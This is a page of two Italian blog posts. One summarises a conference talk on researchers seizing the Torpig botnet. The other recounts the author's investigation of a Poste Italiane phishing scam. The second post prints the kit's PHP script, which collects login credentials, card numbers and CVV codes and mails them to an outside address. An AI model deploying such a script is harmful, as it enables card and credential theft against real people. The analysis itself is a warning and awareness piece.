Arturu.it » carta di credito

Come rubare una Botnet

arturu — Sun, 24 Jan 2010 14:51:51 +0000

Recentemente mi sto interessando di botnet, qualche giorno fa ho visto un interessante video-lezione-conferenza sul furto di botnet. Una botnet è una rete di computer collegati ad internet che fanno parte di un insieme di computer controllato da un’unica entità, il botmaster. Ciò può essere causato da falle nella sicurezza o mancanza di attenzione da parte dell’utente e dell’amministratore di sistema, per cui i computer vengono infettati da virus informatici o trojan i quali consentono ai loro creatori di controllare il sistema da remoto. I controllori della botnet possono in questo modo sfruttare i sistemi compromessi per scagliare attacchi distribuiti del tipo denial-of-service (DDoS) contro qualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo persino su commissione di organizzazioni criminali. I computer che compongono la botnet sono chiamati bot (da roBOT) o zombie. Un gruppo di ricercatori presso UCSB di recente è riuscito a prendere il controllo su una parte di Torpig botnet per 10 giorni. Durante questo periodo, hanno osservato 180 mila infezioni e registrate quasi 70GB di dati raccolti che i bot. Questi dati includono le informazioni presentate da tutti i siti che la persona infetta aveva visitato, smtp, ftp, pop3, Windows, password, numeri di carta di credito e le password da parte dei manager password.

Qui ci sono i fatti più interessanti della conferenza:

Torpig utilizza una tecnica chiamata “flussante dominio” per evitare di essere arrestato, semplicemente bloccando l’IP o il nome del dominio del server del centro di controllo. L’idea è semplice – in funzione della data e ora l’algoritmo genera un nome di dominio a cui connettersi. Se il dominio viene chiuso, il bot userà semplicemente un dominio diverso, dopo qualche tempo. I ricercatori conoscendo la generazione dei nomi di domino sono stati in grado di assumere il controllo su una parte della botnet crackando l’algoritmo di generazione nome di dominio e la registrazione di alcuni dei nome di dominio da utilizzare per la comunicazione.

Successivamente, i cattivi notato che una parte della botnet è stata sottratta, rilasciano un aggiornamento software per tutti i bot che utilizzeranno un nuovo algoritmo di flusso di dominio, questi nuovi algoritmi usano gli argomenti popolari del giorno sul social network Twitter e li utilizzano per generare i nomi di dominio.Con questo nuovo algoritmo i ricercatori non erano più in grado di prevedere il dominio che sarebbe stato utilizzato il giorno successivo, bisognerebbe conoscere un giorno prima l’argomento più polare su un social network che riporta per l’80% notizie in tempo reale.

Quando i bot comunicano con il server di comando trasmettono un campo ID univoco che è stato generato dall’hardware della macchina. Questo ha permesso ai ricercatori di stimare il numero reale di computer infetti. I ricercatori hanno visto 1,2 milioni di indirizzi IP unici, ma soltanto 180.000 macchine. I bot analizzati rubavano i dati finanziari da 410 istituti finanziari (top 5: PayPal, Poste Italiane, Capital One, E * Trade, Chase), avrebbero un registro di carte di credito (prime 5 carte: Visa, Mastercard, American Express, Maestro, Discover ), e avrebbero anche rubato tutte le password dal gestore delle password dei browser.

In uno studio del 2008 Symantec ha stimato che le informazioni riguardanti le carte di credito sono vendute da 10 a 25 dollari per ogni carta nel mercato nero. Le informazioni dei conti bancari sono vendute da 10.00 a 1,000 dollari per ogni conto. L’utilizzo di questo studio ha permesso ai ricercatori di stimare, durante il periodo di 10 giorni, l’importo delle risorse finanziarie che i bots hanno raccolto sono state del valore di 83.000 a 8,3 milioni di dollari. Utilizzando varie stime dei ricercatori si è calcolato che i bot sono usati per il denial of service e la larghezza di banda totale sarebbe 17Gbps.

Dal momento che è stato Torpig a inviare tutti i dati HTTP POST e-mail al server di comando e controllo, i ricercatori hanno statistiche sulle e-mail e hanno scoperto che il 14% di tutte le email sono state lette sui posti di lavoro, il 10% ha parlava di sicurezza del computer / malware, 7% di denaro, 6% erano appassionati di sport, il 5% erano preoccupati per gli esami e la loro qualità, il 4% parlavano della ricerca di partner online. Il 28% delle persone riutilizzato la propria password su più domini. Ci sono state 173.686 password univoche.

I ricercatori hanno convertito le password in formato Unix e hanno cercato di forzarle con John the Ripper. 56.000 erano crackate in meno di 65 minuti con attacco di forza bruta, invece utilizzando un dizionario 14.000 password son bastati 10 minuti. E altri 30.000 sono state le password crackate nelle 24 ore successive. Il 58% di tutte le password sono state crackate in 24 ore.

Il video conferenza è lungo 1h 15m ed è presentato da Richard A. Kemmerer.

Rubare una botnet

Qui ci sono tutti gli argomenti della conferenza:

[02:00] terminologia botnet – bot, botnet, server di comando e controllo, canale di controllo, botmaster.
[03:00] Introduzione al trojan Torpig e la piattaforma Mebroot malware.
[05:00] Come Torpig opere.
[11:30] Torpig iniezione HTML.
[15:00] fluxing dominio.
[19:15] Capofila c Torpig’s & C server.
[24:10] principi di raccolta dei dati.
[26:00] C & C protocollo del server.
[31:10] stima botnet di dimensioni.
[37:00] minacce “botnet” è: il furto di informazioni finanziarie, denial of service, server proxy, furti privacy.
[37:30] Minaccia: furto di informazioni finanziarie.
[42:00] Threat: Denial of Service.
[43:30] minacce: i server proxy.
[44:20] Minaccia: furto Privacy.
[47:00] Analisi Password.
[50:40] punizione penale.
[53:00] applicazione della legge.
[58:00] Rimpatrio dei dati.
[01:00:00] Etica.
[01:02:00] Conclusioni.
[01:06:00] Domande e risposte.

PHISHING: Come ti svuoto la carta di credito

arturu — Wed, 16 Sep 2009 21:37:07 +0000

Quando si parla Phishing la maggior parte delle persone pensa che si stà parlando di bisogni fisiologici oppure i più malizioni pensano subito al mondo dell’erotismo. Il Phishing, è una tecnica di ingegneria sociale, punta a carpire le informazioni riservate di una persona. L’aspetto più tragico delle tecniche di ingnegneria sociale (dato che l’obbietivo sono le informazioni e quindi beni immateriali) è che la vittima difficilmente si accorgerà dell’attacco, a parte quei casi in cui le informazioni sono utilizzate per sottrare beni materiali. Per chi non ne sa niente e volesse approfondire può consultare: Phishing, Ingegneria Sociale.

Ho deciso di parlare di questa tecnica perché stamattina ho subito un tentativo di phishing. Mi è arrivata una mail da Poste Italiane chiedendomi di reinserire i dati del mio conto pena un mancato servizio, logicamente è un tentativo di frode, un modo subdolo per riuscire a carpire i miei dati per rubarmi i miei 20 euri che ho sul conto, cattivone … Ora ti aggiusto io…

Stamattina come al solito vado a controllare la posta. Tra le mail che mi sono arrivate c’erano tre da parte di Poste Italiane. Mi domando “Cosa sarà mai successo. Un cataclisma che incombe su tutto l’universo.”. Poi il contenuto mi ha veramente stupito.

Il contenuto della prima:

Il phishing и una frode informatica, realizzata con l’invio di e-mail contraffatte, inalizzata all’acquisizione, per scopi illegali, di dati riservati.
Gentile Cliente,
nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.

Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

Il contenuto della seconda:

Oggetto: Comunicazione nr. 91219 del 26 Aprile 2007 – Leggere con attenzione

Gentile Cliente,
Nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

A parte che il mio programma di posta (Thunderbird) mi segnalava la possibilità che fosse una frode c’erano molti motivi per capire subito che si trattava di una frode:

Non vengono mai inviate mail che chiedono di reinserire dati a causa di un errore.
L’indirizzo della pagina a cui si arriva schiacciando sul collegamento indicato porta ad una pagina che è identica a poste.it (una copia perfetta) ad esclusione dell’indirizzo.
Non è un collegamento sicuro (https://) ma solo un collegamento normale (http://)
Disgrazie grammaticali.

Molto incuriosito mi sono messo ad indagare. Clicco su un collegamento, il browser (firefox) mi segnala che il sito a cui stò cercando di collegarmi non è quello originale ma una copia, quindi un tentativo di frode. Tra i collegamenti che ho provato alcuni di questi sono stati rimossi, sicuramente per non lasciare prove (vedi figura sopra a destra), invece uno solo ancora era disponibile (nella figura a sinistra). Da persona abbastanza curiosa mi sono messo in testa di scavare molto più a fondo usando questo collegamento.

Come prima cosa ho chiuso tutti gli avvisi di firefox. Nelle caselle dove mi chiedeva “Nome utente” e “Password” ho messo dati fasulli (una valanga di volgarità ). Appena premuto su “Esegui” un’altra schermata simile al sito di poste.it mi chiedeva i dati della carta postepay e qui un’altra valanga di dati falsi (vedi figura a sinistra, è presente anche la funzione che calcola il numero di caratteri inseriti), appena cliccato su “vai” come per magia mi fa arrivare alla vera home page di poste.it, naturalmente per non destare sospetti.

La prima cosa che mi viene da fare è controllare a chi appartiene il sito consultando alcuni database whois come ad esemprio il ripe, però niente. Strano. La società che ha registrato il dominio non ha inserito i dati dell’utente.

Ancora non contento mi sono messo a smanettare con gli indirizzi e arrivo a quello indicato nella figura accanto. Con grandissima sorpresa mi accorgo che il nostro grandissimo e meraviglioso truffatore ha dimostrato che è un emerito imbecille oltre che un ignorate (visti gli orrori grammaticali). Infatti il nostro “eroe” ha lasciato sul server il file .zip in cui erano contenuti i file per poter copiare il sito di poste.it e farsi inviare tramite mail i dati (una copia l’ho salvata qui). Tra i file c’era uno “session.php”:

session_start();
$USER = $_SESSION['USER'];
$PASS = $_SESSION['PASS'];
$CC = $_POST['CC'];
$MONTH = $_POST['EM'];
$YEAR = $_POST['EY'];
$CVV = $_POST['CVV2'];

$ip = getenv(”REMOTE_ADDR”);
$adddate=date(”D M d, Y g:i a”);

$subj = “$USER : $PASS __ $CC $MONTH/$YEAR $CVV “;
$msg = ”

Poste IT

User : $USER
Pass : $PASS

Card Number : $CC
Expiration Date ( mm/yy ) : $MONTH/$YEAR
CVV2 : $CVV

“;

mail(” email@domain.com “, $subj, $msg);
header(”Location: complete.html”);

La cosa interessante è che i dati delle persone truffate vengono inviate alla casella: ” email@domain.com “.

Come prima cosa vado a vedere l’indirizzo http://www.domain.com, sembra il sito di un maintener (società che forniscono dei servizi ai webmaster: registrazione domini, hosting, using, server virtuali, ecc). Interrogo dinuovo il database e:

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

%ERROR:101: no entries found
%
% No entries found in the selected source(s).

Nessuna informazione in merito. Purtroppo sono costretto a fermarmi qui. Da qui in avanti solo la Polizia Postale ha l’autorità giuridica a procedere.

Una piccola osservazione. Meno male che utilizzo Mozilla Firefox e Thunderbird altrimenti potevo cadere nell’inganno. State attenti alle facciate a volte nascondono qualcosa di brutto…